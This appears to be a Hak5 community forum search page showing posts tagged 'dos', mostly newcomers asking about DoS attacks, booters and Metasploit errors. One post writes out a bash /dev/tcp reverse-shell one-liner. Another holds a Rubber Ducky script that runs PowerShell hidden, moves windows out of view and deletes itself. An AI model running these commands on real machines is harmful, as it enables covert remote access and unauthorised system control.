Jump to content

Search the Community

Showing results for tags 'dos'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 11 results

  1. I would be grateful if anyone explain to me about DDoS and DoS . The difference , tutorial(if possible) and how to defend against it. :D Tq
  2. Hi everybody! im trying to use wordpress long password dos auxiliary in metasploit ... but it keeps getting some bad ass error about a month ago i was still using ubuntu and this module was working so god ... but since i moved in to kali im having trouble with it [Forgive me for my fucked up english] these are the error(s): [*] Checking if user "admin" exists... [+] Username "admin" is valid [-] Auxiliary failed: ActiveRecord::StatementInvalid PG::InvalidTextRepresentation: ERROR: invalid input syntax for type inet: "myhost(that i set for rhost)" : SELECT "hosts".* FROM "hosts" WHERE "hosts"."address" = $1 AND "hosts"."workspace_id" = $2 ORDER BY "hosts"."id" ASC LIMIT 1 [-] Call stack: [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql_adapter.rb:602:in `exec_prepared' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql_adapter.rb:602:in `block in exec_cache' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract_adapter.rb:484:in `block in log' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/notifications/instrumenter.rb:20:in `instrument' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract_adapter.rb:478:in `log' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql_adapter.rb:601:in `exec_cache' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql_adapter.rb:585:in `execute_and_clear' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/postgresql/database_statements.rb:160:in `exec_query' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract/database_statements.rb:356:in `select' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract/database_statements.rb:32:in `select_all' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/connection_adapters/abstract/query_cache.rb:70:in `select_all' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/querying.rb:39:in `find_by_sql' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation.rb:639:in `exec_queries' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation.rb:515:in `load' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation.rb:243:in `to_a' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation/finder_methods.rb:500:in `find_nth_with_limit' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation/finder_methods.rb:484:in `find_nth' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation/finder_methods.rb:127:in `first' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activerecord-4.2.7.1/lib/active_record/relation.rb:155:in `first_or_create' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:555:in `create_credential_service' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:423:in `create_credential_origin_service' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:353:in `create_credential_origin' [-] /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/metasploit-credential-2.0.5/lib/metasploit/credential/creation.rb:117:in `create_credential' [-] /usr/share/metasploit-framework/lib/msf/core/auxiliary/report.rb:34:in `create_credential' [-] /usr/share/metasploit-framework/modules/auxiliary/dos/http/wordpress_long_password_dos.rb:88:in `report_cred' [-] /usr/share/metasploit-framework/modules/auxiliary/dos/http/wordpress_long_password_dos.rb:100:in `user_exists' [-] /usr/share/metasploit-framework/modules/auxiliary/dos/http/wordpress_long_password_dos.rb:119:in `run' [*] Auxiliary module execution completed
  3. Not totally sure what I'm doing. I started a reverse shell on my ubuntu machine. 0<&96-;exec 96<>/dev/tcp/192.168.1.4/2222;sh <&96 >&96 2>&96 I get a file descriptor error when I run the command but it opens a shell and I can interact with the target system (Ubuntu 16.04 Desktop). When I use cron_persistence from armitage it seems to work fine. When I reboot the target it just black screens and never runs desktop. It's funny. I had been hacked running Ubuntu about a week ago but I figured that the attacker had intentionally PDOSed my system. It was probably accidental. Anybody have any idea what's going on here? What am I doing wrong with the shell and what do I do to fix the issue on the target machine?
  4. Hi, I am really a newbie when it comes to security, I have an instance hosted on Amazon, it only have LDAP Server installed, Apache server hosting phpLDAPadmin, and one more instance (Client) that connect to this instance to authenticate using LDAP. I was conducting a load test on the Client, after a while got following email from amazon regarding the LDAP server It has come to our attention that Denial of Service (DoS) attacks were launched from your instance to IP(s) xxx.xxx.xxx.xxx via TCP port(s) 53. Please investigate your instance(s) and reply detailing the corrective measures you will be taking to address this activity I am trying to know what happened exactly, to be able to resolve this problem. I have checked the auth.log and founf alot of break-in attempts but none of them where successful, the only accepted Thanks In advance, u7e
  5. So I was watching a video the other day (DefCon Talk) and the guy mentioned a piece of software called SOCKSTRESS. What he said was that it sent packets with a value of 0 or something like that and what it did was eat up the ram on the victims machine ridiculously quick! So I wanted to know if I could put this on a linux based machine like UBUNTU or BT5. And if anyone has any information on this software I would love for you to share it because I would love to learn how to use it! Here is the download: https://defuse.ca/sockstress.htm Here is the Wiki: http://en.wikipedia.org/wiki/Sockstress
  6. Hi guys! So I'm deplyoing my Duck at work , and I have a script (Thanks to DuckToolKit) that saves the user and hardware info of their computer. We're doing an inventory basically. The output of the script saves it as a Report.zip, but I have about 200 computers to go through. Is it possible to have an IF 'Report.zip'=EXIST Then EXIST +1 Basically if Report.zip exists , rename the file to Report1, and so on so the final will have Report, Report1, Report 2, etc. Thanks!! I'll attach my script below: DELAY 1650 GUI r DELAY 1650 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1650 STRING ADMINUSERNAME DELAY 1650 TAB STRING DUMBPASSWORD DELAY 1650 ENTER DELAY 1650 ALT y DELAY 1650 ENTER ALT SPACE DELAY 1650 STRING m DELAY 1650 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $SysBootTime = Get-WmiObject Win32_OperatingSystem ENTER STRING $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime ENTER STRING $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME) ENTER STRING $SerialNo = $SysSerialNo.SerialNumber ENTER STRING $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model ENTER STRING $SysManufacturer = $SysInfo.Manufacturer ENTER STRING $SysModel = $SysInfo.Model ENTER STRING $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption ENTER STRING $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'" ENTER STRING $HD = [math]::truncate($disk.Size / 1GB) ENTER STRING $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB) ENTER STRING $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize ENTER STRING $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB) ENTER STRING $SysCpu = Get-WmiObject Win32_Processor | Select Name ENTER STRING $Cpu = $SysCpu.Name ENTER STRING $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber ENTER STRING $HardSerialNo = $HardSerial.SerialNumber ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name ENTER STRING $graphicsCard = gwmi win32_VideoController |select Name ENTER STRING $graphics = $graphicsCard.Name ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1 ENTER STRING $DriveLetter = $CDDrive.Drive ENTER STRING $DriveName = $CDDrive.Caption ENTER STRING $Disk = $DriveLetter + '' + $DriveName ENTER STRING $Firewall = New-Object -com HNetCfg.FwMgr ENTER STRING $FireProfile = $Firewall.LocalPolicy.CurrentProfile ENTER STRING $FireProfile = $FireProfile.FirewallEnabled ENTER STRING $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>" ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'HP16GB' } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCK' } | select Name ENTER STRING move-item c:\Windows\Report.zip $driveLetter.Name ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1650 STRING C:\Windows\config-47bc5.ps1 ENTER DELAY 1650 ALT F4 DELAY 1650 GUI r DELAY 1650 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1650 STRING ADMINUSERNAME DELAY 1650 TAB STRING ADMINLAMEPASS DELAY 1650 ENTER DELAY 1650 DELAY 1650 ALT y DELAY 1650 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 1650 STRING m DELAY 1650 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1650 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER
  7. Experts, My Understanding, I present myself as a newbie and approching to be a Amateur. I know a little basics of what DoS and DDoS are. And also about the negatives of performing those on others networks. My Goal, is need to perform a DoS and attack on Wireless Switch/Routers. I've my own switches which need to survive DoS attack on wireless control packets. My Need, is how to perform such attack wirelessly. I'm bit handby with Low Orbit Ion Cannon tool which I use for wired attack on packets. Here, I require to perform wirelessly and to do Protocol DoS Attck - wireless.Protocols not just, ping, arp, http. Something indepth like, DHCP, Dot1X, dot11, capwap, dtls, rrm control packets. What tools I can use, what referances I can get and what tutorial and taraings I can have. Any chat formus, where I can ping and expers and ask for advice on hacking? Basically, How to? Greatly appreciate the help!
  8. Hi all! I'm a student and I need to know, JUST IN THEORY, for a research, how to perform a DoS or DDoS attack. I mean, it's performed sending a large number of ping packet or clicking continously on the same link, or I don't know how many other possible ways. What are the common ways to generate a DoS attack? Can anyone help me?! Thanks
  9. tylerp

    Booter

    Hello Forums im fairly new here im currently trying to learn coding and hacking and such, i have recently bought a booter or ddoser and its only 1 gb (1000mb), is that even strong enough to take out someones net for like 5 mins or take them offline for a short time, im new to all this so please dont make fun of me haha, and does anyone know a good website grabber ip thingy, thanks :D
  10. Hello all, This is just a small bit of logic to pull the architecture type from the machine and based on that, perform different functionality calls IE: for Mimikatz using both the 32 / 64 bit versions or with procdump specifying -64 for 64 bit machines or not... etc. STRING wmic computersystem get SystemType | find "x64" >nul&& (set "SystemType=64bit") || (set "SystemType=32bit") Anyhow, you'd put in logic after this which would run your different executable based on the %SystemType% var I'll write up a full demo script in a bit for those of you wanting an example. Thank you. Enjoy!
  11. hey gang! Ok so I'm trying to automate a script for my mother so I can get her work laptop MAC filtered into her home network. She so conveniently keeps forgetting it at work. Bring in the Duck!! Here's my goal: I want to create a payload to where it opens up cmd, does "ipconfig /all", saves what the terminal session spits out to a .txt in the c:\ drive, then copy that newly created .txt to the duck. Here's what I got, that doesn't work: delay 800 gui x (I'm testing this on my windows 8 machine, she still runs XP SP3) up up enter string CMD string ipconfig /all >c:\ipdata.txt ; copy /A ipdata.txt f:\ /A /V delay 300 When I test this on my win8 box, it does open cmd, but after it does a bunch of other crazy things. However if I take the code down to just: delay 800 gui x up up enter string cmd I get the cmd window normally. any ideas?
×
×
  • Create New...